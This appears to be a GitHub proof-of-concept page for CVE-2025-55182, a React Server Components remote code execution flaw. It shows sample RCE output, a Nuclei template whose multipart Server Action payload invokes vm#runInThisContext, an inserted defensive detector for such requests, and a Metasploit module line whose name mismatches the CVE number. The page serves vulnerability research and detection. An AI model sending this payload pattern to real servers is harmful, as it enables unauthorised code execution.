GitHub - ejpir/CVE-2025-55182-research: CVE-2025-55182 POC
PoC for this CVE
Vulnerable versions:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 15.x, 16.x (App Router)
Expected output:
=== CVE-2025-55182 - RCE via vm.runInThisContext ===
Test 1: Direct call to vm#runInThisContext with code
1+1 = {"success":true,"result":"2"}
Test 2: vm.runInThisContext with require
RCE attempt: {"success":true,"result":"uid=501(nick) gid=20(staff)..."}
Nuclei template:
id: CVE-2025-55182
info:
  name: React Server Components RCE - CVE-2025-55182
  author: sickwell
  severity: critical
  description: |
    Remote Code Execution vulnerability in React Server Components via react-server-dom-webpack.
    Missing hasOwnProperty check in requireModule allows prototype chain access to Node.js modules.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182
    - https://github.com/ejpir/CVE-2025-55182-poc
  classification:
    cve-id: CVE-2025-55182
    cwe-id: CWE-20
  tags: cve,cve2025,rce,react,server-components,nodejs
variables:
  boundary: "----NucleiBoundary{{randstr}}"
  math_code: "Math.PI * 2"
  expected_result: "6.283185307179586"
http:
  - method: POST
    path:
      - "{{BaseURL}}/formaction"
      - "{{BaseURL}}/api/formaction"
      - "{{BaseURL}}/api/v1/login"
      - "{{BaseURL}}/actions"
      - "{{BaseURL}}/server-actions"
    headers:
      Content-Type: "multipart/form-data; boundary={{boundary}}"
      User-Agent: "Nuclei - CVE-2025-55182"
    body: |
      --{{boundary}}
      Content-Disposition: form-data; name="$ACTION_REF_0"
      --{{boundary}}
      Content-Disposition: form-data; name="$ACTION_0:0"
      {"id":"vm#runInThisContext","bound":["{{math_code}}"]}
      --{{boundary}}--
    extractors:
      - type: regex
        name: vulnerable_path
        part: url
        regex:
          - '(/(?:formaction|api/formaction|api/v1/login|actions|server-actions))'
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
          - 'contains(body, "result")'
          - 'contains(body, "{{expected_result}}")'
        condition: and
    matchers-condition: and
#cve #poc #react #webpentest #rce
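A defender-side check built from the request shape in the template above, as an added example that is not part of the original post or the referenced repository: it flags multipart form fields named `$ACTION_*` whose JSON `id` points at a Node.js built-in module. The function names, the sample boundary and body, and the assumption that the field value is plain JSON are constructed for illustration.

```javascript
// Added example (not from the original post): flag Server Action form fields
// whose "id" references a Node.js built-in module, e.g. "vm#runInThisContext".
const { builtinModules } = require('node:module');
const BUILTINS = new Set(builtinModules.map((m) => m.replace(/^node:/, '')));

// Split a multipart/form-data body into { name, value } parts.
// Tolerates bodies with or without the blank line after the part headers.
function parseParts(body, boundary) {
  const parts = [];
  for (const chunk of body.split(`--${boundary}`)) {
    const lines = chunk.split(/\r?\n/).filter((l) => l.trim() !== '');
    if (lines.length === 0 || lines[0].trim() === '--') continue; // preamble or closing delimiter
    const headerIdx = lines.findIndex((l) => /^content-disposition:/i.test(l));
    if (headerIdx === -1) continue;
    const m = /name="([^"]*)"/i.exec(lines[headerIdx]);
    if (!m) continue;
    const value = lines.filter((l, i) => i !== headerIdx && !/^content-[\w-]+:/i.test(l)).join('\n');
    parts.push({ name: m[1], value });
  }
  return parts;
}

// Return one finding per $ACTION_* field whose id names a built-in module.
function findSuspiciousActionRefs(body, boundary) {
  const findings = [];
  for (const { name, value } of parseParts(body, boundary)) {
    if (!name.startsWith('$ACTION_') || value === '') continue;
    let ref;
    try { ref = JSON.parse(value); } catch { continue; } // not JSON: ignore
    if (ref === null || typeof ref.id !== 'string') continue;
    const moduleName = ref.id.split('#')[0].replace(/^node:/, '');
    if (BUILTINS.has(moduleName)) findings.push({ field: name, id: ref.id, module: moduleName });
  }
  return findings;
}

// Constructed sample: the field from the template above plus a benign field.
const SAMPLE_BOUNDARY = '----ExampleBoundary';
const SAMPLE_BODY = [
  `--${SAMPLE_BOUNDARY}`, 'Content-Disposition: form-data; name="$ACTION_0:0"', '',
  '{"id":"vm#runInThisContext","bound":["Math.PI * 2"]}',
  `--${SAMPLE_BOUNDARY}`, 'Content-Disposition: form-data; name="comment"', '', 'hello',
  `--${SAMPLE_BOUNDARY}--`,
].join('\r\n');

console.log(findSuspiciousActionRefs(SAMPLE_BODY, SAMPLE_BOUNDARY));
```

The same function can run in a logging middleware or over captured request bodies; a hit is a signal to review the request, and upgrading the affected packages remains the actual fix.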
CVE-2025-55182 is a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC) affecting Next.js applications using App Router with Server Actions.
The vulnerability exists in the Flight protocol deserialization process, allowing attackers to achieve arbitrary code execution through prototype pollution.
Msf:
use multi/http/react2shell_cve_2025_55102
BurpSuite ActiveScan++ detects React2Shell
#cve #poc #nextjs #react